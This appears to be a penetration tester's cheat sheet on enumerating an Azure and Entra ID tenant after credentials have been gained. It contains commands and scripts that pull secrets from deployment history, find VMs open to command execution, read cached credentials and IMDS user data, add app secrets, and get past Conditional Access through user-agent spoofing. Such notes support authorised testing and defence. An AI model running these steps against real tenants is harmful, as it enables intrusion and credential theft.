Authenticated Enumeration

This typically happens after the initial credentials or access tokens are gained through other means.

Tooling

You can also use the web portal at https://portal.azure.com; remember that Conditional Access policies might be circumvented by simply presenting the browser as a mobile device (user agent / device emulation).

You can use command-line tools such as the Az and AzureAD modules, the az CLI, PowerZure and MicroBurst (all used below); these might be less suspicious than clicking through the portal.

You can also use more GUI-oriented tools for this, e.g. the portal itself or BloodHound with Azure data (see the Cypher queries further down).

Enumerate after Access

  • if you get a ‘subscription == null’ error → fall back to raw HTTP calls against the REST APIs
  • always try to log in to the Azure portal web interface with the gained accounts
    • and check ‘All resources’ and ‘Resource groups’
      • especially if there is some form of deployment history (templates and parameter values may contain secrets)
      • if you get a Conditional Access error → try setting the browser to mobile/tablet mode (user agent)

Basic resource access

Get-AzResource
Get-AzResourceGroup
Get-AzResourceGroupDeployment
Save-AzResourceGroupDeploymentTemplate
Get-AzRoleAssignment  # not recursive; use -Scope <scope> (e.g. a resource group or resource id) to see the assignments effective there

Remember that Key Vault has its own access token: data-plane calls need a token for the https://vault.azure.net audience (e.g. Get-AzAccessToken -ResourceTypeName KeyVault), not the ARM token.
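The following is an added example (not part of the original notes) that chains the cmdlets above: it walks every resource group the current identity can see, lists the role assignments effective at that scope, saves each deployment template for offline review and flags clear-text deployment parameters whose name looks secret-related. It assumes an active Az session (Connect-AzAccount); the output folder and the name filter are my own choices.

```powershell
# Added example: resource groups -> role assignments -> deployment history.
# Assumes Connect-AzAccount has been run. $OutDir is an arbitrary output folder.
Import-Module Az.Resources

$OutDir = '.\deployments'
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

foreach ($rg in Get-AzResourceGroup) {
    Write-Host "== Resource group: $($rg.ResourceGroupName)"

    # Assignments at this scope; -Scope also returns assignments inherited from
    # the subscription / management group, which a plain Get-AzRoleAssignment hides
    Get-AzRoleAssignment -Scope $rg.ResourceId |
        Select-Object DisplayName, ObjectType, RoleDefinitionName, Scope |
        Format-Table -AutoSize

    # Deployment history: templates and the parameter values passed in clear text
    # are kept with the deployment and often leak connection strings or admin names
    foreach ($dep in Get-AzResourceGroupDeployment -ResourceGroupName $rg.ResourceGroupName) {
        $path = Join-Path $OutDir "$($rg.ResourceGroupName)_$($dep.DeploymentName)"
        Save-AzResourceGroupDeploymentTemplate -ResourceGroupName $rg.ResourceGroupName `
            -DeploymentName $dep.DeploymentName -Path $path -Force | Out-Null

        # securestring parameters come back empty; everything else is visible
        foreach ($p in $dep.Parameters.GetEnumerator()) {
            if ($p.Key -match 'pass|secret|key|token|cred|conn') {   # heuristic name filter
                Write-Host "  [!] $($dep.DeploymentName): parameter '$($p.Key)' = $($p.Value.Value)"
            }
        }
    }
}
```

Save-AzResourceGroupDeploymentTemplate appends .json to the path, so afterwards grep the folder for strings such as `adminPassword`, `connectionString` or `sas`.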

Basic User Access

Get-AzureCurrentUser # PowerZure
Get-AzureTarget      # PowerZure
Get-AzADGroup        # look for interesting groups (dynamic groups, authentication admins, device admins)
Get-AzPasswords      # MicroBurst; Key Vault secrets need the separate Key Vault token
Get-AzureADMSAdministrativeUnit
 
Get-AzureADDirectoryRole
Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
 
# az can expand group memberships and inherited assignments in one query
az login -u '' -p ''
az role assignment list --assignee 0ccd6182-b034-4e13-a155-1021e7d22d22 --include-groups --include-inherited --query '[].[principalName, roleDefinitionName, principalType, scope]' -o table

Use an HTTP call against Microsoft Graph to get all groups a user is a member of (URL below).

check applications

Get-AzADApplication
 
# load the AzureAD module
Get-AzureADGroupAppRoleAssignment
Get-AzureADApplication -SearchString <application>
 
# try to add a secret to an application you own (does not need a subscription);
# Add-AzADAppSecret is a custom script, not an Az cmdlet (the Az equivalent is New-AzADAppCredential)
Add-AzADAppSecret -GraphToken $token

manually verify VM access rights

If you spot a VM, check for:

  • command execution rights (Microsoft.Compute/virtualMachines/runCommand/action)
  • rights to install VM extensions (Microsoft.Compute/virtualMachines/extensions/write)
  • attached user data

When logging on to the VM itself, remember to try both ‘username’ and ‘.\username’ (local account).

$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value
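The single-VM call above generalises to every VM the identity can see. The following is an added example (not from the original notes) that queries the same permissions endpoint per VM, resolves the wildcard patterns ARM uses in role definitions (`*`, `Microsoft.Compute/*`) against the two actions listed above, and pulls the user data of any VM where one of them is granted. It assumes an active Az session and a recent Az.Compute (for the -UserData switch of Get-AzVM); the wildcard-to-regex matcher is mine.

```powershell
# Added example: which VMs can I run commands on or push extensions to?
# Assumes Connect-AzAccount; Get-AzVM -UserData needs a recent Az.Compute.
Import-Module Az.Accounts, Az.Compute

$Token   = (Get-AzAccessToken).Token
$Headers = @{ 'Authorization' = "Bearer $Token" }

# Actions that give code execution on the VM (documented Microsoft.Compute operations)
$Interesting = @(
    'Microsoft.Compute/virtualMachines/runCommand/action',
    'Microsoft.Compute/virtualMachines/extensions/write'
)

# ARM permission entries use wildcards; turn a pattern into an anchored regex
function Test-ArmAction {
    param([string]$Pattern, [string]$Action)
    $re = '^' + [regex]::Escape($Pattern).Replace('\*', '.*') + '$'
    return $Action -match $re
}

# Returns the subset of $Interesting granted on a VM. An action counts when some
# permission entry lists it in actions and does not exclude it in notActions.
function Get-EffectiveVmActions {
    param([string]$VmResourceId)
    $uri   = "https://management.azure.com$VmResourceId/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
    $perms = (Invoke-RestMethod -Method GET -Uri $uri -Headers $Headers).value
    $allowed = @()
    foreach ($action in $Interesting) {
        foreach ($p in $perms) {
            $granted = @($p.actions    | Where-Object { Test-ArmAction $_ $action }).Count -gt 0
            $denied  = @($p.notActions | Where-Object { Test-ArmAction $_ $action }).Count -gt 0
            if ($granted -and -not $denied) { $allowed += $action; break }
        }
    }
    return $allowed
}

foreach ($vm in Get-AzVM) {
    $actions = Get-EffectiveVmActions -VmResourceId $vm.Id
    if ($actions.Count -eq 0) { continue }
    Write-Host "[+] $($vm.Name) ($($vm.ResourceGroupName)): $($actions -join ', ')"

    # user data is only returned when explicitly requested and comes back base64-encoded
    $ud = (Get-AzVM -ResourceGroupName $vm.ResourceGroupName -Name $vm.Name -UserData).UserData
    if ($ud) {
        Write-Host '    user data:'
        [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($ud))
    }
}
```

Deny assignments are not evaluated here (they are a separate API), so a hit means "a role grants it", which is what you want to confirm before trying Invoke-AzVMRunCommand or Set-AzVMExtension.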

Use an HTTP call to https://graph.microsoft.com/v1.0/users/<upn or object id>/memberOf to check group (and directory role) memberships.
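The following is an added example (not from the original notes) for the memberOf call above and the earlier note on fetching group memberships over HTTP: it requests a Graph token from the Az session, follows @odata.nextLink paging, and lists direct memberships as well as transitive (nested) ones via transitiveMemberOf, marking directory roles and dynamic groups. The target UPN is a placeholder.

```powershell
# Added example: group / role memberships of a user via Microsoft Graph, with paging.
# Assumes Connect-AzAccount; $User is a placeholder for the target UPN or object id.
Import-Module Az.Accounts

$User    = 'target.user@contoso.onmicrosoft.com'
$Token   = (Get-AzAccessToken -ResourceTypeName MSGraph).Token
$Headers = @{ 'Authorization' = "Bearer $Token" }

# GET a Graph collection and keep following @odata.nextLink until it is absent
function Invoke-GraphList {
    param([string]$Uri)
    $results = @()
    while ($Uri) {
        $page     = Invoke-RestMethod -Method GET -Uri $Uri -Headers $Headers
        $results += $page.value
        $Uri      = $page.'@odata.nextLink'
    }
    return $results
}

# memberOf returns directoryObjects: groups, directory roles and administrative units
function Get-GraphMemberships {
    param([string]$UserIdOrUpn, [switch]$Transitive)
    $rel = if ($Transitive) { 'transitiveMemberOf' } else { 'memberOf' }
    $uri = "https://graph.microsoft.com/v1.0/users/$UserIdOrUpn/$rel" + '?$top=999'
    Invoke-GraphList $uri | ForEach-Object {
        $detail = ''
        if ($_.roleTemplateId) { $detail = "directory role, template $($_.roleTemplateId)" }
        elseif (@($_.groupTypes) -contains 'DynamicMembership') { $detail = 'dynamic group' }
        [pscustomobject]@{
            Type        = ($_.'@odata.type' -replace '^#microsoft\.graph\.', '')
            DisplayName = $_.displayName
            Id          = $_.id
            Detail      = $detail
        }
    }
}

Write-Host "== direct memberships of $User"
Get-GraphMemberships -UserIdOrUpn $User | Format-Table -AutoSize

Write-Host "== transitive memberships (nested groups) that are roles or dynamic groups"
Get-GraphMemberships -UserIdOrUpn $User -Transitive |
    Where-Object { $_.Type -eq 'directoryRole' -or $_.Detail } |
    Format-Table -AutoSize
```

If the token was obtained for a different audience you will get a 401 from Graph; the Key Vault, ARM and Graph tokens are separate, as noted above.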

get interesting groups and roles

Get-AzADGroup
 
# interesting: VM Admins, Automation Admins
Get-AzureGroupMember   # PowerZure
Get-AzureADGroupOwner
Get-AzureADGroupMember
 
# can also directly search for objects owned by a user
Get-AzureADUserOwnedObject -ObjectId f66e133c-bd01-4b0b-b3b7-7cd949fd45f3 | select displayname
 
# get information about AD roles
# interesting: Application Administrator, Global Administrator, Intune Administrator, Authentication Administrator
Get-AzureADDirectoryRole
Get-AzureADDirectoryRoleMember
 
# get dynamic groups (membership is decided by a rule on user attributes)
Get-AzureADMSGroup | ?{ $_.GroupTypes -contains 'DynamicMembership' }
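The following is an added example (not from the original notes) that combines the role and group lookups above with the AzureAD module: it dumps the members of the directory roles called out as interesting and, for every dynamic group, its membership rule, processing state and owners, so you can spot rules built on attributes a user may be able to set themselves. It assumes Connect-AzureAD has been run; the role list is taken from the comments above.

```powershell
# Added example: members of interesting directory roles + dynamic group rules.
# Assumes Connect-AzureAD. Role names are the built-in display names.
Import-Module AzureAD

$Roles = @('Global Administrator', 'Application Administrator',
           'Authentication Administrator', 'Intune Administrator')

# Only roles that have been activated in the tenant are returned by Get-AzureADDirectoryRole
foreach ($role in Get-AzureADDirectoryRole | Where-Object { $Roles -contains $_.DisplayName }) {
    Write-Host "== $($role.DisplayName)"
    Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId |
        Select-Object ObjectType, DisplayName, UserPrincipalName, ObjectId |
        Format-Table -AutoSize
}

# Dynamic groups: the rule decides membership. If the rule keys on an attribute
# the user (or an attacker with a weaker role) can change, the group is reachable.
Get-AzureADMSGroup -All $true |
    Where-Object { $_.GroupTypes -contains 'DynamicMembership' } |
    ForEach-Object {
        $owners = (Get-AzureADGroupOwner -ObjectId $_.Id |
                   Select-Object -ExpandProperty DisplayName) -join ', '
        [pscustomobject]@{
            Group  = $_.DisplayName
            Id     = $_.Id
            Rule   = $_.MembershipRule
            State  = $_.MembershipRuleProcessingState
            Owners = $owners
        }
    } | Format-List
```

Cross-check the dynamic groups against the role assignments from the az role assignment list query above: a dynamic group that holds an Azure RBAC role is the interesting combination.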

get device/app owners

Import-Module .\PowerZure.psd1
Get-AzureDeviceOwners
Get-AzureAppOwners
Get-AzureRole -All
Get-AzureUser -All

list applications

Get-AzureADApplication
Get-ApplicationProxyAssignedUsersAndGroups.ps1

service principals (enterprise applications)

Get-AzureADServicePrincipal # returns a lot of entries, filter on DisplayName or -SearchString

Some Cypher queries (BloodHound with Azure data loaded):

MATCH (a)-[r]-(t:AADRole) RETURN *
 
MATCH (a:AADUser)-[r]-(t) RETURN *

Enumerate after VM access

check local credentials

# PowerShell history, transcripts and cached Az CLI / Az PowerShell context files
cat c:\users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
ls c:\transcripts
ls c:\users\*\.Azure
 
# if an az CLI session is cached, reuse it
az ad signed-in-user show
az ad signed-in-user list-owned-objects
az resource list
az role assignment list --assignee <email>
 
# check if there is VM user data (IMDS, base64-encoded)
$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
 
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
 
# check if the device is Azure AD joined/registered (on a real device, not an Azure VM)
dsregcmd /status
 
# if yes, then try to obtain a PRT (Primary Refresh Token) for the signed-in user